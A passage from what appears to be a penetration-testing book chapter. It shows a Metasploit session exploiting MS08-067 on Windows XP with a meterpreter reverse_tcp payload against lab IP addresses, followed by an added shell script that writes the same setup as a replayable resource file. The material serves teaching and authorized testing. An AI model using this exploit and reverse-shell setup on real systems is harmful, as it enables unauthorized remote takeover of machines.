Chapter 5

identified as possibly Windows 2003, but the system is missing key ports that 
would be associated with the Server Edition.) We’ll assume that our target is 
running the English version of XP.

Let’s walk through the actual exploitation. First the setup:

msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)

. . . SNIP . . .

   26  Windows XP SP2 Japanese (NX)

. . . SNIP . . .

msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > show options
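The interactive session above is easy to mistype and hard to reproduce during a report or a retest. The script below is an added example, not code from the book or from the Metasploit project: it validates the addresses and port, then writes the same module setup as a Metasploit resource file that msfconsole can replay with `msfconsole -q -r <file>`. It also runs the smb_version scanner first, because the TARGET id you pick (3 here, "Windows XP SP2 English (NX)", matching the session) must agree with the OS, service pack and language the target actually reports; if the fingerprint is doubtful, pass 0 for Automatic Targeting instead. The hosts, port and target id are assumptions taken from the session on this page.

```shell
#!/bin/sh
# Added example (not from the book): generate a Metasploit resource script
# reproducing the ms08_067_netapi setup shown above, for non-interactive replay.

# Return 0 only for a dotted-quad IPv4 address whose octets are all 0-255.
valid_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Return 0 only for a TCP port in 1-65535.
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the resource script on stdout. Arguments: RHOST LHOST LPORT TARGET.
# TARGET is the id from `show targets` (3 = Windows XP SP2 English (NX) in the
# listing above; 0 = Automatic Targeting). Fails, with a message on stderr,
# if any argument is malformed so a typo never reaches msfconsole.
gen_rc() {
    rhost=$1; lhost=$2; lport=$3; target=$4
    valid_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    case "$target" in ''|*[!0-9]*) echo "bad TARGET: $target" >&2; return 1 ;; esac
    cat <<EOF
# Fingerprint the SMB service first: the OS / service pack / language it
# reports must match the TARGET chosen below, or the exploit will miss.
use auxiliary/scanner/smb/smb_version
set RHOSTS $rhost
run
# Same module and options as the interactive session.
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set TARGET $target
set RHOST $rhost
set LHOST $lhost
set LPORT $lport
show options
# Add an 'exploit' line here once the options above have been reviewed.
EOF
}

# Usage (values are the ones assumed from the session on this page):
#   gen_rc 192.168.33.130 192.168.33.129 8080 3 > ms08_067.rc
#   msfconsole -q -r ms08_067.rc
```

Keeping the generated `.rc` file with the engagement notes records exactly which target id and listener were used, which is what you will need when the exploit fails and you have to work out whether the fingerprint or the target selection was wrong.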